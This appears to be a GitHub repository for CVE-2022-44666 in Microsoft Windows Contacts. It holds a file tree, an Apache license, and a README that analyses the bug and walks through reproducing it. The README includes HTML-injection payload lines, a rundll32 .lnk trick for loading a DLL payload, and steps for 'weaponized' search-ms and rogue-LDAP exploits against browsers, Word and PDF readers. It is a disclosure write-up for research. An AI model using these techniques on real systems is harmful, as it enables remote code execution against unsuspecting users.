├── LICENSE ├── README.md ├── bypass ├── diagcab-pocs │ ├── MSWord │ │ ├── hidden │ │ │ └── @payload.diagcab │ │ ├── setup-hidden.bat │ │ └── url-protocol-ldap │ │ │ ├── exploit.docx │ │ │ ├── exploit.rtf │ │ │ └── poc.html │ ├── cert.cer │ └── ldap-rogue-server │ │ └── ldap-server.py ├── further-pocs │ ├── MSWord │ │ ├── hidden │ │ │ ├── @payload.exe │ │ │ ├── @payload.lnk │ │ │ └── payload.bin │ │ ├── setup-hidden.bat │ │ └── url-protocol-ldap │ │ │ ├── exploit.docx │ │ │ ├── exploit.rtf │ │ │ └── poc.html │ └── ldap-rogue-server │ │ └── ldap-server.py ├── images │ ├── msrc-reply-case-closed.png │ ├── partialmatches-diaphora-wab32dll.png │ ├── show-messagebox-wabexe.png │ └── unmatched-diaphora-wab32dll.png ├── jar-poc │ ├── KB-3133722062023.zip │ ├── create-poc.py │ ├── payload │ │ └── calc.jar │ └── template.contact ├── report-pocs │ ├── bypass.contact │ └── hidden │ │ ├── @payload.exe │ │ ├── @payload.lnk │ │ └── payload.bin └── videos │ ├── install-certificate.gif │ ├── jar-exploit.gif │ ├── ldap-msword-diagcab-exploit.gif │ ├── ldap-msword-exploit.gif │ └── simple-payload.gif ├── further-pocs ├── MSWord │ ├── hidden │ │ ├── payload.bin │ │ ├── payload.exe │ │ └── payload.lnk │ ├── poc │ │ ├── KB5014666-hotfix.contact │ │ ├── KB5014666-hotfix.vcf │ │ ├── poc.docx │ │ ├── poc.html │ │ └── poc.rtf │ ├── remote-weaponized-by-searchms │ │ ├── exploit.docx │ │ ├── exploit.rtf │ │ └── poc.html │ ├── setup-hidden.bat │ └── url-protocol-ldap │ │ ├── exploit.docx │ │ ├── exploit.rtf │ │ └── poc.html ├── PDFreaders │ ├── poc │ │ ├── KB5014666-hotfix.contact │ │ ├── KB5014666-hotfix.vcf │ │ ├── poc-contact.pdf │ │ └── poc-vcf.pdf │ ├── remote-weaponized-by-searchms │ │ ├── exploit.html │ │ └── exploit.pdf │ └── url-protocol-ldap │ │ ├── exploit.html │ │ └── exploit.pdf ├── browsers │ ├── poc │ │ ├── KB5014666-hotfix.contact │ │ ├── KB5014666-hotfix.vcf │ │ ├── poc-contact.html │ │ └── poc-vcf.html │ ├── remote-weaponized-by-searchms │ │ └── exploit.html │ └── url-protocol-ldap │ │ └── exploit.html ├── ldap-rogue-server │ └── ldap-server.py └── to-copy-in-remote-shared-location │ ├── KB5001337-hotfix │ ├── install-hotfix.contact │ └── install-hotfix.vcf │ ├── hidden │ ├── payload.bin │ ├── payload.exe │ └── payload.lnk │ └── setup-hidden.bat ├── images ├── convert-vcf-to-contact-wabmig.png ├── credits-update-cve-2022-44666.png ├── href-attribute-fake-target.png ├── href-attribute-relative-exec-payload.png ├── href-attribute-relative-lnk-payload.png ├── href-attribute-relative-path.png ├── href-attribute-remote-loc.png ├── msrc-reply-se-attack-not-meet-sec-update.png └── msrc-reply-vcf-opened-non-default-program.png ├── report-pocs ├── exploit.contact ├── exploit.vcf ├── exploit.zip └── hidden │ ├── payload.bin │ ├── payload.exe │ └── payload.lnk ├── src ├── dllmain.cpp └── payload.cpp └── videos ├── browsers-exploit.gif ├── browsers-poc.gif ├── full-payload.gif ├── ldap-browsers-exploit.gif ├── ldap-msword-exploit.gif ├── ldap-pdfreaders-exploit.gif ├── micropatch-0patch.gif ├── msword-exploit.gif ├── msword-poc.gif ├── pdfreaders-exploit.gif ├── pdfreaders-poc.gif └── simple-payload.gif /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2023 j00sean 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day). 2 | 3 | This is the story about another forgotten 0day fully disclosed more than 4 years ago by [John Page (aka hyp3rlinx)][R.1]. To understand the report, you have to consider i'm stupid :-) And my stupidicity drives me to take longer paths to solve simple issues, but it also leads me to figure out another ways to exploit some bugs. Why do i say this? Because i was unable to quickly understand that the way to create a .contact file is just browsing to Contact folder in order to create the contact, instead of that, i used this info to first create a VCF file and then, i wrongly thought that this was some type of variant. That was also because of my brain can't understand some 0days are forgotten for so long time ¯\\_(ツ)_/¯ Once done that and after the "wontfix" replies by [MSRC][R.2] and [ZDI][R.3], further investigations were made to increase the severity, finally reaching out .contact files and windows url protocol handler "ldap". 4 | 5 | ## Details 6 | 7 | + **Vendor**: Microsoft. 8 | + **App**: Microsoft Windows Contacts. 9 | + **Version**: 10.0.19044.1826. 10 | + **Tested systems**: Windows 10 & Windows 11. 11 | + **Tested system versions**: Microsoft Windows [Version 10.0.19044.1826] & Microsoft Windows [Version 10.0.22000.795] 12 | 13 | ## Intro 14 | 15 | While i was reading the exploit code for [this vulnerability][R.4] which was actually released as 0day and it's possible to find [ZDI's report][R.5]. 16 | 17 | ***Update 2022/07/21**: After reporting this case to MS, MSRC's folks rightly pointed me out Windows Contacts isn't the default program to open VCF files.* 18 | 19 | ![alt text](<./images/msrc-reply-vcf-opened-non-default-program.png>) 20 | 21 | *Further research still demonstrates the default program for VCF files on Win7 ESU & WinServer2019 is Windows Contacts (wab.exe), otherwise MS People (PeopleApp.exe) is used. Here is a full table of this testing:* 22 | 23 | + *Windows 7: Default program for VCF files is Windows Contacts (wab.exe).* 24 | + *Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).* 25 | + *Windows 10: Default program for VCF files is MS People (PeopleApp.exe).* 26 | + *Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).* 27 | + *Windows 11: Default program for VCF files is MS People (PeopleApp.exe).* 28 | 29 | *Anyway they still argue there's some social engineering involved such as opening a crafted VCF file and clicking on some links to exploit the bug so doesn't meet the MSRC bug bar for a security update.* 30 | 31 | ![alt text](<./images/msrc-reply-se-attack-not-meet-sec-update.png>) 32 | 33 | ***Update 2022/07/25**: Well, after further research, it's the same bug. I've been finally able to find a .contact proof of concept. It's actually possible to correctly parse a .contact file using HTML entities. Note this solves the previous issue (***Update 2022/07/21***) and this file format (.contact) is opened by Windows Contacts, default program for this file extension, even when MS Office is installed in the system. It just needs a first file association if hasn't yet been done, but the only program installed by default to do that is Windows Contacts.* 34 | 35 | ***Update 2022/07/25**: This further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. I was finally able to get it working thanks to ldap uri scheme, which is associated by default to Windows Contacts application, so just setting a rogue LDAP server up and serving the payload data under mail, url or wwwhomepage attributes, the exploiting impact is increased because now it's not needed to double click a malicious VCF/Contact file, we can deliver this using url protocols.* 36 | 37 | ***Update 2023/02/08**: As a gesture of goodwill by MSRC, [John Page (aka hyp3rlinx)][R.1] has been included in the acknowledgement page for [CVE-2022-44666][R.10] discovery.* 38 | 39 | ![alt text](<./images/credits-update-cve-2022-44666.png>) 40 | 41 | ## Description 42 | 43 | The report basically is the same than above links, however i've improved a bit the social engineering involved. In fact, the first thing that i made was to improve the way the links are seen, just like it were a XSS vulnerability, it's actually an HTML injection so it's possible to close the first anchor element and insert a new one. Then, i wanted to remove the visibility for those HTML elements so just setting as long "innerHTML" as possible would be enough to hide them (because of there are char limits). 44 | 45 | This is the final payload used: 46 | 47 | ```html 48 | URL;WORK:">CLICKMEEEEE... 49 | ``` 50 | 51 | To watch what happens, run procmon and setup a fake target of href attribute like this: 52 | 53 | ```html 54 | URL;WORK:">CLICKMEEEEE... 55 | ``` 56 | 57 | Once clicked the link, an output like this is observed in procmon: 58 | 59 | ![alt text](<./images/href-attribute-fake-target.png>) 60 | 61 | This is the stacktrace for the first "CreateFile" operation: 62 | 63 | ``` 64 | 0 FLTMGR.SYS FltpPerformPreCallbacksWorker + 0x36c 0xfffff806675a666c C:\WINDOWS\System32\drivers\FLTMGR.SYS 65 | 1 FLTMGR.SYS FltpPassThroughInternal + 0xca 0xfffff806675a611a C:\WINDOWS\System32\drivers\FLTMGR.SYS 66 | 2 FLTMGR.SYS FltpCreate + 0x310 0xfffff806675dc0c0 C:\WINDOWS\System32\drivers\FLTMGR.SYS 67 | 3 ntoskrnl.exe IofCallDriver + 0x55 0xfffff8066904e565 C:\WINDOWS\system32\ntoskrnl.exe 68 | 4 ntoskrnl.exe IoCallDriverWithTracing + 0x34 0xfffff8066909c224 C:\WINDOWS\system32\ntoskrnl.exe 69 | 5 ntoskrnl.exe IopParseDevice + 0x117d 0xfffff806694256bd C:\WINDOWS\system32\ntoskrnl.exe 70 | 6 ntoskrnl.exe ObpLookupObjectName + 0x3fe 0xfffff8066941329e C:\WINDOWS\system32\ntoskrnl.exe 71 | 7 ntoskrnl.exe ObOpenObjectByNameEx + 0x1fa 0xfffff806694355fa C:\WINDOWS\system32\ntoskrnl.exe 72 | 8 ntoskrnl.exe NtQueryAttributesFile + 0x1c5 0xfffff80669501125 C:\WINDOWS\system32\ntoskrnl.exe 73 | 9 ntoskrnl.exe KiSystemServiceCopyEnd + 0x25 0xfffff806692097b5 C:\WINDOWS\system32\ntoskrnl.exe 74 | 10 ntdll.dll NtQueryAttributesFile + 0x14 0x7ff8f0aed4e4 C:\Windows\System32\ntdll.dll 75 | 11 KernelBase.dll GetFileAttributesW + 0x85 0x7ff8ee19c045 C:\Windows\System32\KernelBase.dll 76 | 12 shlwapi.dll PathFileExistsAndAttributesW + 0x5a 0x7ff8ef20212a C:\Windows\System32\shlwapi.dll 77 | 13 shlwapi.dll PathFileExistsDefExtAndAttributesW + 0xa1 0x7ff8ef2022b1 C:\Windows\System32\shlwapi.dll 78 | 14 shlwapi.dll PathFileExistsDefExtW + 0x3f 0x7ff8ef2021ef C:\Windows\System32\shlwapi.dll 79 | 15 shlwapi.dll PathFindOnPathExW + 0x2f7 0x7ff8ef201f77 C:\Windows\System32\shlwapi.dll 80 | 16 shell32.dll PathResolve + 0x154 0x7ff8eebb0954 C:\Windows\System32\shell32.dll 81 | 17 shell32.dll CShellExecute::QualifyFileIfNeeded + 0x105 0x7ff8eebb05c9 C:\Windows\System32\shell32.dll 82 | 18 shell32.dll CShellExecute::ValidateAndResolveFileIfNeeded + 0x5e 0x7ff8eeb1e422 C:\Windows\System32\shell32.dll 83 | 19 shell32.dll CShellExecute::_DoExecute + 0x6d 0x7ff8eeb1e1cd C:\Windows\System32\shell32.dll 84 | 20 shell32.dll :: + 0x2d 0x7ff8eeb09fed C:\Windows\System32\shell32.dll 85 | 21 SHCore.dll _WrapperThreadProc + 0xe9 0x7ff8f098bf69 C:\Windows\System32\SHCore.dll 86 | 22 kernel32.dll BaseThreadInitThunk + 0x14 0x7ff8f07e7034 C:\Windows\System32\kernel32.dll 87 | 23 ntdll.dll RtlUserThreadStart + 0x21 0x7ff8f0aa2651 C:\Windows\System32\ntdll.dll 88 | ``` 89 | 90 | Setting a breakpoint in **Shell32!ShellExecuteExW**, we can have a clearer picture of the functions involved: 91 | 92 | ``` 93 | CommandLine: "C:\Program Files\Windows Mail\wab.exe" /vcard C:\Users\admin\Documents\vcf-0day\exploit.vcf 94 | ... 95 | ModLoad: 00007ff7`c7d50000 00007ff7`c7dd5000 wab.exe 96 | ... 97 | 0:000> bp SHELL32!ShellExecuteExW 98 | ... 99 | Breakpoint 0 hit 100 | SHELL32!ShellExecuteExW: 101 | 00007ff8`eeb20e40 48895c2410 mov qword ptr [rsp+10h],rbx ss:000000d8`dc2dae88=0000000000090622 102 | 0:000> k 103 | # Child-SP RetAddr Call Site 104 | 00 000000d8`dc2dae78 00007ff8`d3afee27 SHELL32!ShellExecuteExW 105 | 01 000000d8`dc2dae80 00007ff8`d3ad7802 wab32!SafeExecute+0x143 106 | 02 000000d8`dc2dbf90 00007ff8`ef3b2920 wab32!fnSummaryProc+0x1c2 107 | 03 000000d8`dc2dbfc0 00007ff8`ef3b20c2 USER32!UserCallDlgProcCheckWow+0x144 108 | 04 000000d8`dc2dc0a0 00007ff8`ef3b1fd6 USER32!DefDlgProcWorker+0xd2 109 | 05 000000d8`dc2dc160 00007ff8`ef3ae858 USER32!DefDlgProcW+0x36 110 | 06 000000d8`dc2dc1a0 00007ff8`ef3ade1b USER32!UserCallWinProcCheckWow+0x2f8 111 | 07 000000d8`dc2dc330 00007ff8`ef3ad68a USER32!SendMessageWorker+0x70b 112 | 08 000000d8`dc2dc3d0 00007ff8`d93a6579 USER32!SendMessageW+0xda 113 | 09 000000d8`dc2dc420 00007ff8`d93a62e7 comctl32!CLink::SendNotify+0x12d 114 | 0a 000000d8`dc2dd560 00007ff8`d9384bb8 comctl32!CLink::Notify+0x77 115 | 0b 000000d8`dc2dd590 00007ff8`d935add2 comctl32!CMarkup::OnButtonUp+0x78 116 | 0c 000000d8`dc2dd5e0 00007ff8`ef3ae858 comctl32!CLink::WndProc+0x86ff2 117 | 0d 000000d8`dc2dd6f0 00007ff8`ef3ae299 USER32!UserCallWinProcCheckWow+0x2f8 118 | 0e 000000d8`dc2dd880 00007ff8`ef3ac050 USER32!DispatchMessageWorker+0x249 119 | 0f 000000d8`dc2dd900 00007ff8`d92b6317 USER32!IsDialogMessageW+0x280 120 | 10 000000d8`dc2dd990 00007ff8`d92b61b3 comctl32!Prop_IsDialogMessage+0x4b 121 | 11 000000d8`dc2dd9d0 00007ff8`d92b5e2d comctl32!_RealPropertySheet+0x2bb 122 | 12 000000d8`dc2ddaa0 00007ff8`d3acfb68 comctl32!_PropertySheet+0x49 123 | 13 000000d8`dc2ddad0 00007ff8`d3ace871 wab32!CreateDetailsPropertySheet+0x930 124 | 14 000000d8`dc2de140 00007ff8`d3ad68f5 wab32!HrShowOneOffDetails+0x4f5 125 | 15 000000d8`dc2de390 00007ff8`d3af800f wab32!HrShowOneOffDetailsOnVCard+0xed 126 | 16 000000d8`dc2de400 00007ff7`c7d51b16 wab32!WABObjectInternal::VCardDisplay+0xbf 127 | 17 000000d8`dc2de450 00007ff7`c7d52c28 wab!WinMain+0x896 128 | 18 000000d8`dc2dfab0 00007ff8`f07e7034 wab!__mainCRTStartup+0x1a0 129 | 19 000000d8`dc2dfb70 00007ff8`f0aa2651 KERNEL32!BaseThreadInitThunk+0x14 130 | 1a 000000d8`dc2dfba0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 131 | ``` 132 | 133 | And the involved pseudo-code is the next: 134 | 135 | ```cpp 136 | _int64 __fastcall fnSummaryProc(HWND hWnd, int a2, WPARAM a3, LONG_PTR a4) 137 | { 138 | 139 | ... 140 | 141 | default: 142 | if ( !((v22 + 4) & 0xFFFFFFFD) && *(_WORD *)(v5 + 136) ) 143 | SafeExecute(v7, (const unsigned __int16 *)v9, (const unsigned __int16 *)(v5 + 136)); <== FOLLOW THIS PATH 144 | break; 145 | } 146 | } 147 | return 1i64; 148 | } 149 | 150 | 151 | __int64 __fastcall SafeExecute(HWND a1, const unsigned __int16 *a2, const unsigned __int16 *a3) 152 | { 153 | const unsigned __int16 *v3; // rbx 154 | HWND v4; // rdi 155 | unsigned int v5; // ebx 156 | BOOL v6; // ebx 157 | __int64 v7; // rdx 158 | OLECHAR *v8; // rax 159 | signed int v10; // eax 160 | DWORD pcchCanonicalized; // [rsp+20h] [rbp-E0h] 161 | SHELLEXECUTEINFOW pExecInfo; // [rsp+30h] [rbp-D0h] 162 | OLECHAR Dst[2088]; // [rsp+A0h] [rbp-60h] 163 | 164 | v3 = a3; 165 | v4 = a1; 166 | memset_0(Dst, 0, 0x1048ui64); 167 | pcchCanonicalized = 2084; 168 | v5 = UrlCanonicalizeW(v3, Dst, &pcchCanonicalized, 0); 169 | if ( (v5 & 0x80000000) == 0 ) 170 | { 171 | v6 = UrlIsW(Dst, URLIS_FILEURL); 172 | pExecInfo.hProcess = 0i64; 173 | pExecInfo.hwnd = 0i64; 174 | pExecInfo.lpVerb = 0i64; 175 | _mm_store_si128((__m128i *)&pExecInfo.lpParameters, (__m128i)0i64); 176 | *(_OWORD *)&pExecInfo.hInstApp = 0i64; 177 | *(_OWORD *)&pExecInfo.lpClass = 0i64; 178 | *(_OWORD *)&pExecInfo.dwHotKey = 0i64; 179 | if ( !ShellExecuteExW(&pExecInfo) ) <== CALL HERE 180 | { 181 | v10 = GetLastError(); 182 | v5 = (unsigned __int16)v10 | 0x80070000; 183 | if ( v10 <= 0 ) 184 | v5 = v10; 185 | } 186 | } 187 | ... 188 | } 189 | ``` 190 | 191 | After this, it's clear the issue actually involves [SysLink controls in comctl32.dll library][R.6] and how the href attribute is parsed by wab32.dll library. 192 | 193 | It isn't possible to use remote shared locations or webdavs to exploit this. 194 | 195 | ```html 196 | URL;WORK:">CLICKMEEEEE... 197 | URL;WORK:">CLICKMEEEEE... 198 | ``` 199 | 200 | The file info is queried but is never executed. 201 | 202 | ![alt text](<./images/href-attribute-remote-loc.png>) 203 | 204 | It's possible to use relative paths such as: 205 | 206 | ```html 207 | URL;WORK:">CLICKMEEEEE... 208 | ``` 209 | 210 | ![alt text](<./images/href-attribute-relative-path.png>) 211 | 212 | Example: 213 | 214 | ```html 215 | URL;WORK:">CLICKMEEEEE... 216 | ``` 217 | 218 | ![alt text](<./images/href-attribute-relative-exec-payload.png>) 219 | 220 | Just going further and while testing rundll32 as attack vector, just noticed it was not possible to use arguments with the payload executable selected. However using a lnk file which targets a chosen executable, it was possible to use cmdline arguments. It's a bit tricky but it works. 221 | 222 | ```html 223 | URL;WORK:">CLICKMEEEEE... 224 | ``` 225 | 226 | Target of run.lnk: 227 | 228 | ``` 229 | rundll32.exe hidden\payload.bin,Foo" 230 | ``` 231 | 232 | ![alt text](<./images/href-attribute-relative-lnk-payload.png>) 233 | 234 | This looks more interesting because it's not needed to drop an executable in the target system. 235 | 236 | 237 | ## Impact 238 | 239 | Remote Code Execution as the current user logged. 240 | 241 | 242 | ## Proofs of Concept 243 | 244 | It has to exist file association to use Windows Contacts to open .vcf files. 245 | 246 | ***Update 2021/07/25**: For Contact files (.contact) there is only one application to open them by default: Windows Contacts, even when MS Office is installed in the target system.* 247 | 248 | Using files located in [./report-pocs/](./report-pocs/): 249 | 250 | 1. Double-click the file [exploit.vcf](./report-pocs/exploit.vcf) (***Update 2021/07/25***: Or double-click the file [exploit.contact](./report-pocs/exploit.contact)). 251 | 2. Do single click in one of "click-me" links. 252 | 3. It launches notepad.exe using different ways to execution: 253 | - 3.1. Link 1: Run .lnk file that triggers rundll32 with a crafted library. 254 | - 3.2. Link 2: This triggers the execution of an executable located in folder "hidden" as a local path. 255 | - 3.3. Link 3: Directly. 256 | 257 | 258 | There are a couple of videos attached in [./videos](./videos): 259 | 260 | + [./videos/simple-payload.gif](./videos/simple-payload.gif): This is an example to download a single vcf file and triggers the bug. 261 | 262 | ![alt text](<./videos/simple-payload.gif>) 263 | 264 | + [./videos/full-payload.gif](./videos/full-payload.gif): This is a more complex example which downloads a zip file that allows to trigger all the payloads. 265 | 266 | ![alt text](<./videos/full-payload.gif>) 267 | 268 | This is a summary of the proof of concept files located in ./report-pocs/: 269 | 270 | + [./report-pocs/exploit.vcf](./report-pocs/exploit.vcf): Proof of concept to double-click it. 271 | + [./report-pocs/exploit.zip](./report-pocs/exploit.zip): Zipped file to be downloaded which includes all the tricks to exploit the bug (video: [full-payload.gif](./videos/full-payload.gif)) 272 | + [./report-pocs/hidden/payload.lnk](./report-pocs/hidden/payload.lnk): LNK file to run the payload with cmdline arguments. 273 | + [./report-pocs/hidden/payload.bin](./report-pocs/hidden/payload.bin): DLL payload. It finally runs notepad.exe 274 | + [./report-pocs/hidden/payload.exe](./report-pocs/hidden/payload.exe): Executable payload. It finally runs notepad.exe 275 | 276 | 277 | And files located in [./src](./src): 278 | 279 | + [dllmain.cpp](./src/dllmain.cpp): DLL library used as payload (payload.bin). 280 | + [payload.cpp](./src/payload.cpp): Executable used as payload (payload.exe). 281 | 282 | 283 | ## Further exploitation 284 | 285 | For further exploitation and as the vulnerability doesn't allow to load remote shared location files, uri protocol "search-ms" is an interesting vector. You'll find proofs of concept which only trigger a local binary like calc or notepad and more complex proofs of concept that i've named as weaponized exploit, because of they don't execute local files. These pocs & exploits are located in [./further-pocs/](./further-pocs/). 286 | 287 | This is a summary of target applications: 288 | 289 | * Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera. Note uri protocol "search-ms" is [disabled for Mozilla Firefox at the time of writing this write-up][R.7]. 290 | * MS Word. 291 | * PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader). 292 | 293 | In order to reproduce: 294 | 295 | 1. Setup a remote shared location (SMB or WebDav). Copy content of [./further-pocs/to-copy-in-remote-shared-location/](./further-pocs/to-copy-in-remote-shared-location/) into it. 296 | 2. If wanted, hide the files running [./further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat](./further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat). 297 | 3. Modify file exploit.html/poc.html located in ./further-pocs/[vector or target app]/remote-weaponized-by-searchms/ to point to your remote shared location. 298 | 4. Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/[poc||remote-weaponized-by-searchms]/. 299 | 5. Run poc/exploit files depending on the case. 300 | 6. For further info, watch the videos located in [./videos](./videos): 301 | - 6.1. PoC for browsers: [./videos/browsers-poc.gif](./videos/browsers-poc.gif). 302 | 303 | ![alt text](<./videos/browsers-poc.gif>) 304 | 305 | - 6.2. Exploit for browsers: [./videos/browsers-exploit.gif](./videos/browsers-exploit.gif). 306 | 307 | ![alt text](<./videos/browsers-exploit.gif>) 308 | 309 | - 6.3. PoC for MS Word: [./videos/msword-poc.gif](./videos/msword-poc.gif). 310 | 311 | ![alt text](<./videos/msword-poc.gif>) 312 | 313 | - 6.4. Exploit for MS Word: [./videos/msword-exploit.gif](./videos/msword-exploit.gif). 314 | 315 | ![alt text](<./videos/msword-exploit.gif>) 316 | 317 | - 6.5. PoC for PDF Readers: [./videos/pdfreaders-poc.gif](./videos/pdfreaders-poc.gif). 318 | 319 | 